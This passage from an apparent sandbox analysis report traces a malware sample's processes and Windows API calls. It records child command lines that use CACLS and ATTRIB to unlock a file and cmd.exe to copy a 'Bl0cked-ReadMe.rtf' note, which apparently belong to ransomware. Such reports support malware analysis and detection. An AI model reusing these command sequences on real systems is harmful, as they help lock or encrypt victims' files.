lpExitCode=0x14f3fc | out: lpExitCode=0x14f3fc*=0x0) returned 1 [0149.439] CloseHandle (hObject=0x4c) returned 1 [0149.439] _vsnwprintf (in: _Buffer=0x14f544, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f408 | out: _Buffer="00000000") returned 8 [0149.439] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.439] GetEnvironmentStringsW () returned 0x172480* [0149.439] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.439] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.439] GetEnvironmentStringsW () returned 0x172480* [0149.439] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.439] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f460 | out: lpAttributeList=0x14f460) [0149.439] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.439] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.440] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.440] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.440] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.440] SetConsoleInputExeNameW () returned 0x1 [0149.440] GetConsoleOutputCP () returned 0x1b5 [0149.440] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.440] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.440] exit (_Code=0) Process: id = "228" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0xc10" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19139 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 19140 start_va = 0x910000 end_va = 0x918fff entry_point = 0x910000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19144 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 19145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19146 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19147 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19148 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19149 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 19150 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 19151 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19152 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19153 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19154 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19155 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19156 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19157 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 289 os_tid = 0xc24 Thread: id = 290 os_tid = 0xc90 Process: id = "229" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "227" os_parent_pid = "0xc10" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19220 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19221 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19222 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19223 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19224 start_va = 0x7b0000 end_va = 0x7b6fff entry_point = 0x7b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19225 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19226 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19227 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19228 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 19229 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19230 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19231 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19232 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19233 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 19234 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 19235 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19236 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19237 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19238 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19239 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19240 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19241 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19242 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19243 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19244 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19245 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19246 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19247 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19248 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19249 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 291 os_tid = 0x5fc Process: id = "230" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x46c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19250 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19251 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19252 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19253 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19254 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19255 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19256 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19257 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19258 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19259 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19260 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19261 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19262 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19263 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 19264 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 19265 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19266 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19267 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19268 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19269 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19270 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19271 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19272 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19273 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19274 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19275 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19276 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19277 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19278 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 19279 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19280 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19281 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 19282 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 19283 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 19284 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 292 os_tid = 0x8d4 [0149.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbe4 | out: lpSystemTimeAsFileTime=0x30fbe4*(dwLowDateTime=0x9307ed80, dwHighDateTime=0x1d440a9)) [0149.488] GetCurrentProcessId () returned 0x46c [0149.488] GetCurrentThreadId () returned 0x8d4 [0149.488] GetTickCount () returned 0x2e4d2 [0149.488] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbdc | out: lpPerformanceCount=0x30fbdc*=20627722898) returned 1 [0149.489] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.489] __set_app_type (_Type=0x1) [0149.489] __p__fmode () returned 0x76b331f4 [0149.489] __p__commode () returned 0x76b331fc [0149.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.489] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.489] GetCurrentThreadId () returned 0x8d4 [0149.489] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8d4) returned 0x38 [0149.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.489] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb74 | out: phkResult=0x30fb74*=0x0) returned 0x2 [0149.489] VirtualQuery (in: lpAddress=0x30fbab, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.490] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb44, dwLength=0x1c | out: lpBuffer=0x30fb44*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.490] GetConsoleOutputCP () returned 0x1b5 [0149.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.490] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.490] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.491] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.491] GetEnvironmentStringsW () returned 0x4301c8* [0149.491] FreeEnvironmentStringsW (penv=0x4301c8) returned 1 [0149.491] GetEnvironmentStringsW () returned 0x4301c8* [0149.491] FreeEnvironmentStringsW (penv=0x4301c8) returned 1 [0149.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eae4 | out: phkResult=0x30eae4*=0x40) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x0, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x0, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.491] RegCloseKey (hKey=0x40) returned 0x0 [0149.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eae4 | out: phkResult=0x30eae4*=0x40) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x40, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x1, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x0, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, 